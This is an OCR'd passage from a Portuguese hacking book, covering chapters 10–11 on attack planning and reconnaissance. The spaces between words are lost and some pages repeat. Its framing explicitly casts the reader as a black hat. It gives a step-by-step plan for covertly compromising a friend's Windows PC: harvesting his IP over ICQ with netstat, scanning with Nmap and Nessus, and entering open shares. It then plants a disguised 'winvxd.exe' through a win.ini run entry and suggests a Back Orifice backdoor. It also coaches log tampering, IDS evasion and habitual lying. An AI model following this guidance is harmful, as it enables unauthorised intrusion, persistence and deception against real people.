Infelizmente,aresposta,emumapalavra,ésim.Nossossistemasdeinforma-
ção,comtodosospatches,ServicePacksecorreções,sãofalhosporqueforam
desenvolvidossemlevarasegurançaemconta.Émuitomaisfácilplantarárvo-
resquefazerenxertos.
Nãopodemos,nemqueremosoutemosespaçoparademonstrarafundotodos
ostiposdevulnerabilidadesexistentes.Ocapítulos7,VulnerabilidadesI,eeste
serviramapenasparaquevocêtomecontatocomalgumastécnicasesparsas
sobreoassunto.Nospróximoscapítulos,daremosumavisãomaisclaradecomo
seplanejaumataque,comosedefenderdeleseoquefazercasosejainvadido.
Falandoemcontra-ataque,recentementefoilançadoum"brinquedo"quecaça
edestróioshackersqueoinvadiram.Acessewww.backfiresecurity.co.uke
saibamaissobreele.
12091
IVulnerabilidades11

Universidade3°Ano:
Tornando-seumHacker

Ataque,defesae
contra-ataque:
Introducão
.
Capítulo10
L./comefeceRomolo,ocomunquesechiamasse
ilcapoccionedequeitipacC/;aprocurardonneaseeaisuoi
compani.Indisseunagrandefesta,1.../
einvitàaprenderviparteivicinidicasasabinil.../
callorore,TitoTazio,esopratuttolelorofiglie': 1
IndroMontanelli,"StoriadiRoma",1957
1"C.')comofezRômulo,oucomoquerquesechamasseochefe
daquelescaras,paraconseguirmulheresparasieparaseuscompa-
nheiros.DeuumagrandefestaC.,)econvidouseusvizinhos,ossabinos
C.')quetrouxeramseurei,TitoTácio,esobretudosuasfilhasC.')"Um
excelenteexemplodeengenhariasocialdaquelaépoca.Afasedeplaneja-
mentodessafestaéalgodignodeleitura.

Universidade3°Ano:
Tornando-seumHacker

Ataque,defesae
contra-ataque:
Introducão
.
Capítulo10
"f.../comefeceRomolo,ocomunquesechiamasse
ilcapoccionedequeitipacci,aprocurardonneaseeaisuoi
compani.Indisseunagrandefesta,
LI
einvitàaprenderviparteivicinidicasasabinil.../
collorore,TitoTazio,esopratuttolelorofig/ie ".'
IndroMontanelli."StoriadiRoma". 1957
1"(...)comofezRômulo,oucomoquerquesechamasseochefe
daquelescaras,paraconseguirmulheresparasieparaseuscompa-
nheiros.Deuumagrandefesta(...)econvidouseusvizinhos,ossabinos
(...)quetrouxeramseurei,TitoTácio,esobretudosuasfilhas(...)"Um
excelenteexemplodeengenhariasocialdaquelaépoca.Afasedeplaneja-
mentodessafestaéalgodignodeleitura.

IUniversidadeH4CK3R I I
Chegamosàpartecrucialdenossocurso.Atéaquivimosdiversastécnicas
pontuaiseespecíficasdeataque,usandoferramentasprontasoubaseadasem
conceitosmuitorudimentares.Foraoexpostoenpassantnoscapítulosde
VulnerabilidadesIe11,nãofoimostradanenhumaestratégiaouplanejamento.
Fazendoumaanalogiacomomundoreal,ensinamosaapertarparafusos,a
estamparpeçasemaço,aprojetarcircuitoselétricos,ainstalarsomautomotivo
eafabricarpneusepeçasplásticasapartirdederivadosdepetróleo.Masnão
ensinamoscomomontaroautomóvel.
Apartirdeagora,começaremosaverascoisasdeformamaissistemática,
seguindoumaordemlógicaefundamentandotodososprocedimentoscom
informaçõesarespeitodastecnologiasen40lvidas.
EMTEMPO:parafinsdidáticos,consideramosqueoleitorquersetornarum
blackhatedirecionamosotextoparaesseobjetivo.Entretanto,osautores
repudiamissoeeximem-sederesponsabilidadedequalqueratodecorrente
dasinformaçõesaquicontidas,eseuusoédeinteiraresponsabilidadedolei-
tor.LembramosqueestasinformaçõesestãolivrementedisponíveisnaInternet
epodemserfacilmenteencontradas.
Osseispassospara
umhackingfeliz
Seis?Nãoeramquatro?Nocapítulo7(Vulnerabilidades1),descrevemosumpeque-
noroteiroparaplanejamentoeexecuçãodeataques,quereproduzimosabaixo:
1.Umavezdescobertaavulnerabilidade,nãotenteinvadirsuapresaimedia-
tamentejAocontrário,conheçasuavítima.VisiteseusitenaInternet(semata-
car,apertasolhe).Sefornasuacidade,visitesuasedeetentedescobrirmais
sobreprodutos,empregos,serviços,funcionários,hábitos...Podem-seusartéc-
nicaspassivas(observação:paraveroqueentraeoquesaidamáquinaou
rede)ouativas,comoorganizarminiataquesapontosisoladoseverificaras
mensagensquesãoretomadas.Oimportanteécoletarinformaçõessuficientes
paraelaborarumplanodeação,preferencialmentecomdesfechosalternati-
voscasoalgodêerrado.
2.Oprimeiroacessoagentenuncaesquece.Essaéapartemaisimportante
doataque.Pode-sedizerqueestaetapaéoataquepropriamentedito.Depois
dedescobertaavulnerabilidadeeexaminadoocomportamentodavítima,use
oexploitapropriadoparaganharacessolimitadoaosistema.Enãoseesqueça
deusarumproxypúblicoparaesconderseuendereçoIP!!!
3.Humm.Umavezcomacessolimitado,apróximaetapaconsisteemganhar
acessototalàmáquina(rootparasistemasUnix,administradorparasistemas
WinNT-noWin9x,oprimeiroacessojágarantecontroletotal...).CadaSO
possuiprocedimentosdiferentesparatal.Umavezconseguidooacessoirrestrito,
bastacoletarasinformaçõesdesejadase,seforocaso,desfigurarosistema.
2141
Ataque,defesaecontra-ataque:IntroduçãoI

Universidade3°Ano
4.Agoraquevocêjá"ownou"osistema,tratedecobrirseusrastroseinsta-
larasportasdetrás.Verifiqueoslogsdosistemaeapaguetudooquefor
relativoàsuavisita,MASAPENASISSO!Resistaàtentaçãodeapagarolog
todo-um"buraco"noregistrodeeventosfarácomqueoadministrador
descubramaiscedodoqueoesperadoquealguémandoubulindocomseu
brinquedo.Depoisdefazeracirurgianoslogs,instaleosbackdoors.Alguns
hackersmaisexperientestêmocuidadodeaplicarpatchesnosistemapara
removerasportasqueodeixaramentrar,evitandoassimqueoutroshackers
menoshabilidososentremnosistemae,pordescuido,alertemoadministra-
dordequeamáquinafoitomada.
Masnestepontodolivro,nossoobjetivonãoémaisagircomoscriptkiddies,
quevagampelaInternetprocurandoporpresasfáceisquesaibamcaçar.Ao
contrário,queremosterumaidéiadecomoblackhats,digamos,"profissio-
nais"trabalhamparaalcançarseusobjetivosemumalvoespecífico,qualquer
quesejaseuníveldedificuldade.Paratanto,vamostentarseparar,porafini-
dade,nossosesforçosemseispassosdistintos.Comoguerraéoassuntodo
momento,usaremostermosmilitaresparanosreferiracadaumdeles.Talvez
ascruzadas,asguerrasdoParaguai,Vietnã,Meganistão,osconflitosnaPales-
tinaouatémesmoaGuerranoGolfo2tenhampassado.Masoscybercombates
entrehackers/crackerseadministradoresdesistemasvãodurarmuitosanos,
talvezséculos.
~Passo1:Planejamento
Hummm,édifícildizerseesteérealmenteopasso1.Naverdade,todosos
passossãointerdependentes:precisamosdasinformaçõesobtidasemcada
movimentoquefazemosparapoderplanejar(ecorrigir)adequadamentenos-
soataque.Aseqüênciadeatividadesserá,portanto,algoparecidocom1-2-1-3-
1-4-1-5-1-6-1,emvezdaóbvia1-2-3-4-5-6.
Comotodoplanoprecisadeajustesecomoquasetodatarefapodesersub-
divididaemváriasmaisespecíficas,podemosperceberqueoprocessodepla-
nejamentoserácontínuodurantetodaabatalhaeduraráatébemdepoisda
fmalizaçãodoataque.Cadapequenodetalhedoataquetemseupróprioplano
1-2-1-3-1-4-1-5-1-6-1.Sevocênãodocumentarmuitobemcadaumdospassos
quetemafazer,acabarácomumbocadograndedemaisparamastigarsem
estalaraboca.Enãoesqueça:formasdeesconderasprovasdocrimetambém
fazempartedoplanejamento!
Nãobastasaberoqueestáfazendo.Énecessáriosaberporqueestáfazendo.
Sevocêtemumarespostanapontadalínguaquandoperguntado"ei,porque
vocêquerinvadirminhaempresa?"podeseguiremfrente.Masnãoseesqueçade
que,umavezdentro,vocêserárastreado.Sevocêjásabeoquequerfazerquando
estiverentreosmurosdocastelo,ótimo.Senãosabe,nãotente!Enãoesqueça
que,dependendodeseusintentos,vocêestaráincorrendoemalgumcrime.
12151
]Ataque,defesaecontra-ataque:Introdução

IUniversidadeH4CK3R I
~Passo2:Observação
Todaoperaçãomilitar,sejagovernamentaloudosrebeldes,precisaestar
embasadaeminformaçõesprecisasedetalhadassobreoalvo.Oconjuntode
dadosnecessáriosincluemdiversossubconjuntosaparentementenãorelacio-
nados:detalhespessoais,comohábitos,habilidadesprofissionais,passatempos,
família,amigos,antigasnamoradas;informaçõescorporativas,hierarquiainter-
na,clientes/concorrentes/fornecedores,dadossobreossistemasdeinforma-
ção...Domonstrodedadosobtido,háaindaanecessidadedegarimparinfor-
maçõesnãodisponíveisdiretamente,fazerreferênciascruzadase,literalmen-
te,"lernasentrelinhas".
Váriastécnicaspodemserusadasaqui.Amaisóbviaeeficaz(emboramenos
diretaemaisperigosa)éaEngenhariaSocial.Masmesmosemcontarmentira
alguma,épossívelcoletarumacoleçãorazoáveldeinformaçõesobtidasdaInternet
oudeobservaçãodireta.Nãoseafobe:paciênciaéapalavra-chaveaqui.
~Passo3:Busca
Comosplanos,mapasealistadetarefasnamão,podemoscomeçaraprocu-
rarosburacospelosquaisvamosentrar.Umarsenalnumerosoevariadode
scannersdeportasevulnerabilidadesdeveestaràdisposiçãoparaquetodos
ospontosfracossejamrevelados.Assimcomonopassoanterior,paciênciaé
umdosingredientesmaisimportantesdestaetapa.Masnãooúnico.Nãobasta
usarumaferramentaquereveleofurodesegurançasevocênãoentendecomo
elafunciona.
~Passo4:Invasão
Háváriasmaneirasdeganharacessoaosistema-alvo.Noscapítulos
VulnerabilidadesIe11vimosalgumas.Massãotécnicaspontuais,queexploram
fraquezasespecíficasdeumsistema.Agrandesacadaésaberagruparasvárias
técnicasdisponíveisdemaneiraaatingiroobjetivomaior.Alémdisso,muitas
vezesénecessáriopassarporváriosníveisdeacessoatéconseguirpoderes
suficientesparaatingiroobjetivofinaldoataque.
~Passo5:Manutenção
Nemtodososadministradoresderedesãocompletosidiotas.Amaioria,na
realidade,nãoé.Umavezdetectadaumavulnerabilidadequepossibiliteumata-
que,qualqueradministradorprovidodebomsensovaiaplicarospatchesde
segurança,fechandoorombo.Sevocêjáinvadiuumavezporumburacona
segurançaouumafalhaemalgumprograma,épossívelquesuapróximatenta-
tiva,diasdepois,sejainfrutífera:aportaestaráfechada.Umavezdentrodos
murosdocastelo,énecessárioinstalarmeiosparaquesepossaentraresairsem
sernotado,equesejamindependentesdasbrechasdesegurançadosistema.
12161
Ataque,defesaecontra-ataque:Introdução[

Universidade3°Ano
~Passo6:Evasão
"Jáinvadi,jácopiei,jádesfigurei,jáapagueiejádestruí,eaindadeixeiportas
secretasporondeentraresairsemserincomodado.Eagora,façooquê?"Bem,
pequenogafanhoto,estánahoradeapagarosrastrosquevocêdeixou.Essa
etapacomeçajánapreparaçãodoataque,escolhendoasferramentaseprocedi-
mentosmenosruidosos,tomandocuidadoparanãodeixaraparentequeestá
logadonosistemae,principalmente,tentandodescobrirantesdeentrarsehá
umsistemaIDSativo.Depoisdefazeroquetemdefazer(defacement,cópiade
arquivoseprogramas,lançamentodeoutrosataques),apaguecriteriosamente
suaspegadasnosarquivosderegistrodosistema,tomandoocuidadodenão
danificarosoutrosdadosregistrados.Éumafalhaamadoríssima"limpar"demais
ologoOutrocuidadoquedevesertomadojánospassosiniciaisdeplanejamento
éaprevençãocontrasistemasdedetecçãodeintrusos,osfamigeradosIDSs.
oportal
Estamosprestesaentrarnoladonegro.Umavezlá,muitosficarãotentados
anãosair.Éumriscoquetodostemosdecorrer.Naspróximaspáginasvere-
mos,deformadetalhada,comolevaracabocadaumdospassosvistosaqui.A
escolhaétodasua,caroleitor.
Amelhormaneiradeorganizarasidéiasépegarumpedaçodepapel(prefi-
ropapelàteladocomputador)erabiscaralgumascoisas.Aspessoasnormal-
menteperguntam-seporondecomeçar,esquecendo-sedequeaúnicacoisa
quesabeméaondequeremchegar.Portanto,vamoscomeçarpelofim.Nosso
objetivoépregarumapeçaemnossoamigocomumprogramainofensivoe
incómodo(chato,mesmo!).
PROGRAMA
CHATO
12171
IAtaque,defesaecontra-ataque:Introdução

IUniversidadeH4CK3R I I
Sóessequadrojánossuscitaváriasdúvidas:
1.Qualprogramausaremos?
2.Comoseráinstalado?
3.Serádisparadoportempooueventos?
4.Temtamanhomáximodefmido?
5.Oseuamigoéentendidodecomputadoresevaisaberoquefazerquando
oprogramadisparar?
6.Querqueoprogramadigaonomedoautordabrincadeiraouquemante-
nhasegredoatéquevocêriabastante?
Umavezformuladasasperguntasiniciais(nãosepreocupe,outrasaparece-
rão...),temosdegastarumpoucodetempopensandoepesquisandopara
respondê-las.Algumasrespostasplausíveispoderiamser:
1.SeuamigoétorcedorfanáticodaPontePreta.Doente.Possuifaixas,cami-
sasoficiaisdediversosanosautografadaspelosjogadores,ésóciofundadordo
clube...QuetalumaanimaçãoemFlash,criadaporaqueleseucolega
webdesignernumfavormuitoespecial,comemorandoaderrotadaPontePre-
taparaoXVdePiracicaba?
AnimaçãoemFlash?IssoquerdizerquesuavítimausaWindows,certo.Seele
usarMacoualgumUnixissonãovaifuncionar.Esteéumótimoexemplode
comooplanejamento,emboraestejaindobem,precisadeajustes.Imaginese
vocêtivesseenviadoaanimação"nalouca"edescoberto,posteriormente,que
nãofuncionouporqueseuamigo/vítimausaFreeBSD?
Temos,então,de,pormeiodeEngenhariaSocial(oucomaajudadoNmap,...)
saberqualosistemaoperacionaldavítima.Porengenhariasocial,descobrimos
queéoWindowsMe.
2.Ainstalaçãoéoutroproblema.Vocêpodefazerseuamigoinstalarabom-
baparavocê,bastaenviá-lapore-maildizendoqueéumf1lminholegal.Masa
vítimaédesconfiada(vocêjásabedisso,oconheceháanos),enãovaiabrir
qualquercoisaquechegue.
Vocêpoderiaelaborarume-mailHTMLcomumVBScriptqueinstalasseo
programaautomaticamente,masvocêteriadesaberqualoclientedee-mail
queeleusa.Porengenhariasocial,descobrimosqueeleusaoTheBat
(www.ritlabs.com/thebat-osautoresrecomendam!!!),queépremiadíssimo
justamenteporserimuneaessascoisas.
OuaindausaralgumavulnerabilidadedoWindows.Paraissoprecisaríamos
rodarumscannerqualquer,comooNmap.MasnãotemosoIPdele,entãoé
necessárioarranjarumartificioparadescobri-lo.
VocêtemdeencontrarumaformadefazercomqueoFlashdisparedepois
deumtempoourespondaaumevento.Astrêsopçõesmaissimples,sempre-
cisarinteragirafundocomoprópriosistemaoperacional,são:
12181
Ataque,defesaecontra-ataque:Introdução

~Umtrojan,paravocêcontrolarabombaremotamente;
~OFlashser"fundido"aumprogramadosistema(comoacalculadoraouo
blocodenotas)paraque,quandoesteforaberto,aqueleentreemoperação;
~OpróprioFlashserrodadonainicializaçãoepossuirumtimeoutdepelo
menosumahoraparaentraremação;
~Umacombinaçãodetodoseles.
Nessescasos,quantomenormelhor,masprecisamos
sabercomoéaconexãodonossoamigoparadetermi-
narotamanhodaanimação.Seavítimativerummodem
de33,6K,certamenteperceberáseestivermosfazen-
doumuploaddeumaanimaçãoFlashde2Mbytes...
Perguntando,vocêdescobrequeeleéassinantedeum
grandeprovedornacionaldeacessorápido-olhaàí,
umainformaçãoquepodeserútilmaistarde...
Seuamigoéesperto,éengenheiroeletrônicoeé
umusuárioavançadodeinformática.Mesmoassim,
nãoentendedosdetalhesinternosdesoftware(o
negóciodeleéhardware)esemprepedeajudaavocê
para"calibrar"oWindowsdele,quando"dápau".
(quemsabenãoéporissoquevocê,inconsciente-
mente,estáfazendoessasacanagem?)
Dejeitonenhum!Negoatéamorte!
Humm...sevocêcolocoutodasessasperguntas,res-
postaseponderaçõessobreasrespostasemumafo-
lhadepapel,apósalgumtempolendoerelendoo
resultado,chegamosaodiagramaaolado.Observea
dúvidaquesurgiunoúltimoquadro:comoinvadir?
Nãosabemosquaisasvulnerabilidadesexistentes,
poisnaetapa"Buscaporbrechas"nãotínhamosoIP
davítimaparaprocurá-la.
HádiversasmaneirasdeobteroIPdealguém.Uma
delaséperguntando.Amaioriadaspessoasnãovai
desconfiarqueéparaalgo"malvado".Masnãoéo
casodoseuamigo.
VocêcostumaconversarporICQcomele.Háal-
gunsanos,opróprioclientedeICQdiriaoIPda
outrapessoa.Hojeháapossibilidadedecamuflar
essainformação.Dependendodaversão,entretanto,
edasopçõesescolhidasnaconfiguração,mesmoos
maismodernospodemrevelartalinformação.Isso
porqueoICQdeambososladosdaconversapode
seconectartantodiretamentequantoatravésdeum
servidorcentral.
Passos2e3:
Observacãoeb
Passo4:Invasão
Escolhadoprograma-bomba
Passo4:Invasão
Métododeinvasão
???????????
Universidade30Ano
12191
IAtaque,defesaecontra-ataque:Introdução
----
Determinação
do
ambiente
-Engenhariasocialpara
determinarSOeMUA
-Resultado:WinMEeTheBat
Busca porbrechas
-Scanparaobterfalhase
determinarquaisusar
-Scannersescolhidos:Nmape
Nessus
Programa Chato
-AnimaçãoemFlashexecutável
noWindows
-Tema:PontePretaOx1XVde
Piracicaba
Camuflagem eControle
-Flashcomtempodeespera
-InstaladonoWIN.INIparaser
escondidoobastante,mesmo
assimfacilmenteremovível

IUniversidadeH4CK3R I
Vamosfazerumatentativa.Espere
eleentraron-lineeinicieumacon-
versação.Desliguetudooqueacessar
àInternetemseucomputador:
e-mail,navegadores,eMule,KaZaA,
MSNMessenger,deixandoapenaso
ICQ.Troquealgumasmensagenscom
eleepeçaqueelelheenviealgumar-
quivorazoavelmentegrande(MP3,
imagem,programa,qualquercoisa).
Antesdeaceitaratransferência,abra
umajaneladoMS-DOS.
Duranteatransferência,useocomandonetstat-na
najaneladoMS-DOS,damesmamaneiracomovocê
feznoscapítulosdeRedes11eVulnerabilidades11.Na
listadeconexõesquevaiaparecer,asúltimasdelas
sãoosIPsdasuaconversaçãoedatrocadearquivos.
OIPremotomostradoéodele.
Essadicafuncionacomqualquertransferênciade
dadoson-lineentreosdoiscomputadores.E-mailnão
éon-line:quemtransfereéoservidorSMTP,nãoapes-
soaqueoenviou.NocasodoMSNMessenger,doAOi
InstantMessengeredoYahoo!Messenger,asmensa-
genssãosempreintermediadaspelosrespectivosser-
vidores,portanto,onetstatvaimostraroIPdoservi-
dorPassport.NET,porexemplo...Comumaexceção:
atransferênciadearquivosaindaépeer-to-peer.Seo
seuamigousarMSNenãoICQ,peçaparaeleenviar
umarquivogrande.OIPdelecertamenteaparecerá
nalistadonetstatcomesteartifício.
AgoraquetemosoIPdavítima,vamosescaneá-Ia.UsandooNmap,descobri-
mosque,pordescuido,nossoamigoengenheirodeixouoscompartilhamentos
dediscoligadosesemsenhas.NadamaissimplesdoqueabrirumInternet
Exploreredigitar\IP.DA.VITIMA.AQUI.Pronto!Vocêjáestánamáqunadele,
podeabrireeditararquivos.
Comessasalterações,nossodiagramajáestáfuncional.Vamoselaborar,agora,
umalistaseqüencialdeetapasparanossoataque?Afmal,nãopodemosfazertudo
aomesmotempo,entãotemosqueorganizarascoisas.Napróximapáginaestá
umalistadepassos.Éinteressantedesedeixeumespaçoabaixodecadaitem,
paraquesepossaescreverosresultados,observaçõesouproblemasencontrados.
Oscomentáriosentreparêntesesnãofazempartedoroteiro.Sãoapenas
orientaçõesparaqueaelaboraçãodoroteirocumpraoobjetivopretendido.
Passos2e3:
Observaçãoebusca
Passo4:Invasão
Escolhadoprograma-bomba
ProgramaChato
-AnimaçãoemFlash
executávelnoWindows
-Tema:PontePretaOx1
'.01dePiracicaba
Camuflagem eControle
-Flashcomtempodeespera
-InstaladonoWIN.INIparaser
escondidoobastante,mesmo
assimfacilmenteremovível
Internet Explorer
-\IP.VÍTIMA
-Copiarbombapara
C:\Windows
-EditarWIN.INI
-Esperar
1220I
Ataque,defesaecontra-ataque:IntroduçãoI
Determinação doIPDetenninaçãodoambiente
-ICQouMSNMesseger -Engenhariasocialpara
-Transferênciadearquivos
determinarSOeMUA
-Netstat-na -Resultado:WinMEeTheBat
I
I
-.
Buscaporbrechas
-Scanparaobterfalhasedeterminar
quaisusar
-Scannersescolhidos:NmapeNessus
-Resultado:C",=tilhamentode
Arquivosabertos
(TCP139)

Universidade3°Ano
PASSOSPARAHACKEARFULANODETAL
1.EngenhariaSocial:conversainformalparasaberdetalhesdesistema
operacional.
2.Busca:DeterminaçãodoIPcomICQenetstat.Seopasso1forforfeitopor
ICQtambém,matamosdoiscoelhos.(QueimaretapasédesejávelDESDEQUE
nãointerfiranasuasegurança.)
3.EscanearavítimacomNmapedepoisNessusparaverificaras
vulnerabilidades.(Alistaparariaaquiatéquedescobríssemosporondeatacar.
Éumexemplode1-2-1-3-1.)
4.Descobertaabrechadecompartilhamento.Preparararquivocombombapara
serimplantadonavítima.Flashcombombadeespera.Usarr.otinastaletal.(Use
sempreferramentaselinguagensquevocêconheceBEM!Deslizessãofatais...)
5.Testeseuarquivolocalmente.Renomeie-oparawinvxd.exe.
(Sempreinstaleumsistemaoperacionalidênticoaodavítima.Instaleprogra-
masparecidosaosdelaetentedeixarsuamáquinamuitopróximaaoquevocê
conseguiudescobrirdasconfiguraçõesdocomputadorinvadido.Quandoalgu-
maetapaordenaracópiadearquivosparaavítima,renomeie-oscomnomes
parecidoscomosdosistema).
6.[OPCIONAL]Testeospassosdenúmero7emdianteemumambiente
controlado.Depoisdecertificar-sedavalidadedesteroteiro,ataqueavítima.
(Opcionalquaseobrigatório.Façaumataquesimilaraumcomputadorseme-
lhantequeestejadisponíveleemquevocêpossaverificaravalidadedoataque.
Umamigohackerpoderiaajudá-Ionessahora.Colaboraçãoéimportantíssimo
nessemeio.)
7.Conectaraocomputador.UseoInternetExplorercomaURL
\\XXX.YYY.ZZZ.UUU.
(Acostume-seacolocarinformaçõesespecíficasemseusroteiros,comopro-
gramasausar,opçõeseconfiguraçõesdessesprogramas,endereçoseportasa
atacareprotocolosutilizados.Nãoapenaspassosgenéricos.Umataquetem
deserrápidoparaserefetivoeindetectado.Ficarprocurandoasopçõeses-
condidasdeumprogramaduranteainvasãoépedirparaserapanhado!)
8.Copieoarquivowinvxd.exeparaC:\windows.
(Cuidadocomarquivosmuitograndes.LentidãonaInternetseguidadeativi-
dadenodiscorígidosãoeventossuspeitíssimos!)
12211
IAtaque,defesaecontra-ataque:Introdução

IUniversidadeH4CK3R I
9.
AbraoarquivoC:\windows\win.ini e,na,linha"run=",digite
c:\windows\winvxd.exe.
10.Espereeriamuito!
Éclaroquenossoataquefoisemimportância,avítimafácileoprograma-
bombanãomuitoelaboradoefacilmentedetectável.Mas,oraveja,funciona!
Nossoroteirotambémébemsimples,emboraumataquepormeiodelejá
sejapossível.Masporquenãoalgumnívelderefmamento?Algumasidéias:
~PrepararumBackOrifice(depreferênciaoB02K)einstalá-Iojuntocomo
Flashnowin.ini.Mesmoquetudosejadescoberto(owin.inirestauradoeo
Flashapagado),nossobackdoorvaiestarnoregistrodoWindowse,portanto,
sempreativoquandoavítimaligarocomputador.
~Porfalaremregistro,usá-Ioemvezdowin.ini.Talprocedimentoprecisará
depassosamais,acriaçãodeumarquivocomextensão.regparaatualização
doregistrodavítimaeprovavelmenteumconhecimentomaisprofundosobre
ofuncionamentodomesmo(consultarcapítulosobrePlataformasWindows).
~Lugaresóbviossãoosúltimosaseremprocurados.Certavez,alguém
haviafeitoumabrincadeiracomigo.MeuMS-DOS5congelavanofinaldo
carregamentodoConfig.sys.Issojáeraumadica,maseuignorei.Decididoa
procuraroproblemaemvezdereinstalarosistematodo(jáhaviamuitos
programas,algunsdosquaisprecisavamserinstaladospelopessoaldoCPD),
deibootpordisqueteeabrioConfigsys,comentandotodasaslinhas,umaa
uma,paraverificarsetravavam.Nadafeito.Vasculheiinfrutiferamentetodo
osistemaàprocuradeproblemas.Depoisdeduashoras,decidiabriro
AUTOEXEC.BATsópordesencargodeconsciência.Quasecaípratrás.No
iníciodoarquivo,duaslinhas:
@ECHO OFF
C:\AUTOEXEC.BAT
Nãoprecisodizermaisnada...
2221
Ataque,defesaecontra-ataque:Introdução[

Universidade3°Ano
Umapalavrafinalsobreplanejamento
Sevocêchegouatéaquieexclamou:"Puxa,maselenãoensinounadadifícil!
Queporcariadelivro!",sintomuito,masestelivrorealmentenãoépravocê.O
objetivodocapítulofoimostrar,sobopretextodeumainvasãosimples,como
organizar-separatal.
Nospróximoscapítulosveremosospassosseguintesdenossosataques:obser-
vação,busca,invasão,manutençãoeevasão.Algumastécnicasadicionaiselocais
ondeencontrarmaisinformaçõesarespeitoserãoincluídos.Mascomoque
temosatéagora(ecomumpoucodedisposiçãoparapesquisa),jáépossível
atacar,defenderemesmocontra-atacarquaisquerpessoasouinstituições.
Osautoresvoltamainformar:aresponsabilidadedousodestasinformações
ésua,nãonossa.Handlewithcare.
12231
IAtaque,defesaecontra-ataque:Introdução

Ataque,defesae
contra-ataque:
Observacão.
Capítulo11
'Youhavetobetru5ted
bythepeop!eyou!iedto
50whentheytumtheirback5onyou
youhavethechancetoputtheknifein
"1
RogerWaters,"Oogs"
1"Devesteraconfiança/daspessoasparaquemmentiste/pois
quandoteviraremascostas/terásachancedeenfiarafaca."
DoálbumAnimaIs(PinkFIoyd),de1977.

IUniversidadeH4CK3R I
Adiferençaentreosscriptkiddieseosblackhatsmaisespertoscomeçanesta
fase(naverdade,começanaanterior,masmuitosblackhatsreconhecidamente
bonstambémnegligenciamafasedepreparação...).Assimcomoquadrilhasob-
servambancospormeseseseqüestradoresacampamemfrenteàcasadesuas
vítimas,atacantesdigitaisdignosdessenometêmdeobservarsuaspresas
longamenteantesdemergulharsobreelascomofalcõessobrefrangos-de-leite.
Estecapítulotratarárapidamentedealgumasáreasnasquaisocandidatoa
invasorpoderáprocurarparaangariarinformaçõessobreasempresas,pesso-
ase,principalmente,seussistemascomputacionaisedeconectividade.
Resumindo:querbrincarnarua?Antesfaçaodeverdecasa!
EngenhariaSocial
Nocapítulo6,tivemosumprimeirocontatocomaartedementir.Comoa
mentira,aimposturaeadesonestidadesãotãoantigasquantoosprimeiros
macacosfalantesquevagavamporaí,nãohámeiosdescrevertodososproce-
dimentospossíveis.
Nãovamos,aqui,chovernomolhadoerepetiroquedissemosnocapítulo6.
Useamaldadeque100%daspessoastêmescondidaporaíemalgumcantoe
desenvolvaseusprópriosmétodos.OquefuncionouparaMitnickpodenão
funcionarparavocê.
Dicas?Aívãoalgumas:
~Façaaulasdeteatro.Dicaóbvia.
~Impostaçãodevoz,segurançaefIrmezasãoimportantes.Façaaulasdecanto.
~Procurelivrossobreprogramaçãoneurolingüística.Vaiquebrarumgalhão.
~Acostume-seaolharSEMPREolixo,mesmoemcasa!Sejaumblackhatde
hábitos...
~Mintaparaseuchefe,parasuamãe,paraopadreemconfIssão.Treinea
mentira.Elaésuaferramentamaispoderosa.Nemtodososscannersdomundo
podemdescobrirascoisasquesimplesperguntasfeitascomaentonaçãocor-
retaconseguememcincominutos.
Nãobastasaberoqueestáfazendo.Énecessáriosaberporqueestáfazendo.Se
vocêtemumarespostanapontadalínguaquandoperguntado"ei,porquevocê
querinvadirminhaempresa?",podeseguiremfrente.Masnãoseesqueçade
que,umavezdentro,vocêserárastreado.Sevocêjásabeoquequerfazerquando
estiverentreosmurosdocastelo,ótimo.Senãosabe,nãotente!Enãoesqueça
que,dependendodeseusintentos,vocêestaráincorrendoemalgumcrime.
12261
Ataque,defesaecontra-ataque:Observação

Universidade3°Ano
Agrandeteia
PossocontarnosdedosaquantidadedecoisasquenãoacheipelaInternet.
Certavez,estavaajudandominhanamoradafrancófonaaprocuraralgumas
letrasde"chansons"parainseriremumacompilaçãoqueelaestavafazendo.
Umadasmúsicas,"Çaira"(quepossuidiversasversõescomdiferentesletras),
estavasendodurodeencontrar.Segueodiálogo:
-Nãoconsigoacharestaaqui.
-Qualé?
-"Çaira",váriasgravações,entreelasadeEdithPiaf.
-JátentounoAllTheWeb?
-Já,tambémnoGoogleenoAltaVista.
-Comovctentou?
-Procureipelonome,só.DepoistenteinomedamúsicamaisEdithPiaf.
-Possotentar?Normalmente,euuso,paraletraseminglês,onomeda
música,onomedoartistamaisapalavralyrics.Comoéletraemfrancês?
-Parole.
-Tentaaí:çairapiafparole
Elatentoue,parasuacompletaestupefação,encontrouváriossitescomas
letras,inclusivealgunscontendoreferênciascruzadas,asváriasversões
agrupadaseaspectoshistóricosesociaisligadosaelas.
AInternet,nogeral,eaWorldWideWebemespecial,sãopródigaseminfor-
maçõessobresuapessoa,sejaelafísica,ousejajurídica.Muitasdelasforam
colocadasláporninguémmenosquevocêmesmo.Seusfuncionários,sevocê
ostiver,tambémsãograndesfontesdeinformação.Vejamos.
oGoogleéseuamigo
Éimpressionantecomoosrobôsdessesmecanismostrabalhamdireito!Quem
nãosabecomooAltaVistatemcatalogadotodosaqueleslinksmereceuma
explicaçãorápida.
Hádoistiposdemecanismosdebusca:oscatálogos(atraduçãocertapara
directory,apesardemuitostraduziremcomodiretório...)eosbaseadosemro-
bôs.Catálogossãosimpleslistasdesitesqueosprópriosinteressadosinscre-
vem.Porexemplo,oYahoo!hospedasitesemseubraçocorporativoGeocities.
EssessitesautomaticamenteentramnocatálogodoGeocities,queadicionalmen-
teaceitainscriçõesemseucatálogodesitesexternos.Quandoinscrito,umpro-
grama-robôvarretodoositedapessoaecadastraaspalavras-chavedotexto.
Umsitebaseadoemrobôsusaumprogramaparecidocomodoscatálogos.A
diferençaéqueninguémprecisacadastrarnada:osrobôsfarejamumlinke
saemseguindoesseslinksInternetadentro.Comoaspáginasnormalmente
chamamoutraspáginas,éumtrabalhosemfim.
12271
IAtaque,defesaecontra-ataque:Observação

IUniversidadeH4CK3RI
Issoposto,éfácilimaginarque
osrobôsumdiachegarãoaoSEU
website.Talvezvocêousuaem-
presanãotenhaumwebsite,mas
seguramenteusae-mailseassi-
nalistasdediscussão.Ouacessa
aUsenet.Ouaindaseinscreveem
outrossitespúblicos,comoo
Hotmail,edeixaseuperfilvisí-
velaomundo.Sóatítulodeexem-
plo:eu(Henrique)nãopossuo
umwebsitepróprio.Massoubas-
tanteruidosonaInternet;assino
dezenasdelistasetenhoalguns
artigospublicadosemrevistase
jornais.Umapesquisapelomeu
nomeresultaem:
,.--.-
--,,~-
-~
,,
"
._,----
:"~::iíI~,-~*~--
